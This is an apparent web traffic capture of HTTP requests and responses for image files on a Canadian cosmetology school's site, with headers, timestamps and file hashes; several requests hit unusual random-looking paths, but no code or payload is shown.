Sha256: 7853aaf8099d3131138a4747628617d45b25c7e959bf57819db2397276bdd90f
                                        
                                            GET /templates/shahnaz/images/contact-bg.png HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/templates/shahnaz/css/template.css
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 409 Conflict
Content-Type: text/html; charset=iso-8859-1
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:39 GMT
Content-Length: 83
Connection: keep-alive


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   83
Md5:    26267cd8990f15d3bbea71684a6d5995
Sha1:   ac3b38cf3fe0e112bb6aeb7e05226b7133575d93
Sha256: 769e8ab745a0fe4bf811036e75a8630e38c50a18cb3e24d539ce4a0722c7c85e
                                        
                                            GET /templates/shahnaz/images/main-bg.jpg HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/templates/shahnaz/css/template.css
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:39 GMT
Content-Length: 25785
Connection: keep-alive
Last-Modified: Thu, 01 Nov 2012 10:10:20 GMT
Accept-Ranges: bytes


--- Additional Info ---
Magic:  JPEG image data, EXIF standard
Size:   25785
Md5:    bda65c9d0fbaec9733287880f834fef1
Sha1:   ce309c770811fe51a25b8714b904ac38d93dc609
Sha256: 90da5001d864d1cba02f578f18909057a1aca8e49d87fbc2d2f3bd4e026139b9
                                        
                                            GET /vyhcz/wpuiz/rfwlz/vycez/images/hairdressing.jpg HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: ytm_hit1=2; df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:38 GMT
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Fri, 18 Jan 2019 20:55:38 GMT
Content-Encoding: gzip


--- Additional Info ---
                                        
                                            GET /vyhcz/wpuiz/rfwlz/vycez/images/aesthetic.jpg HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: ytm_hit1=2; df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:38 GMT
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Fri, 18 Jan 2019 20:55:38 GMT
Content-Encoding: gzip


--- Additional Info ---
                                        
                                            GET /vyhcz/wpuiz/rfwlz/vycez/images/pctia.jpg HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: ytm_hit1=2; df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:38 GMT
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Fri, 18 Jan 2019 20:55:38 GMT
Content-Encoding: gzip


--- Additional Info ---
                                        
                                            GET /vyhcz/wpuiz/rfwlz/vycez/images/applynow.jpg HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: ytm_hit1=2; df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:38 GMT
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Fri, 18 Jan 2019 20:55:38 GMT
Content-Encoding: gzip


--- Additional Info ---
                                        
                                            GET /vyhcz/wpuiz/rfwlz/vycez/images/advanced-aesthetic.jpg HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: ytm_hit1=2; df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:38 GMT
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Fri, 18 Jan 2019 20:55:38 GMT
Content-Encoding: gzip


--- Additional Info ---
                                        
                                            GET /vyhcz/wpuiz/rfwlz/vycez/images/bottom-logo.jpg HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: ytm_hit1=2; df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:39 GMT
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Fri, 18 Jan 2019 20:55:39 GMT
Content-Encoding: gzip


--- Additional Info ---
                                        
                                            GET /vyhcz/wpuiz/rfwlz/vycez/images/banner1.jpg HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: ytm_hit1=2; df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:38 GMT
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Fri, 18 Jan 2019 20:55:38 GMT
Content-Encoding: gzip


--- Additional Info ---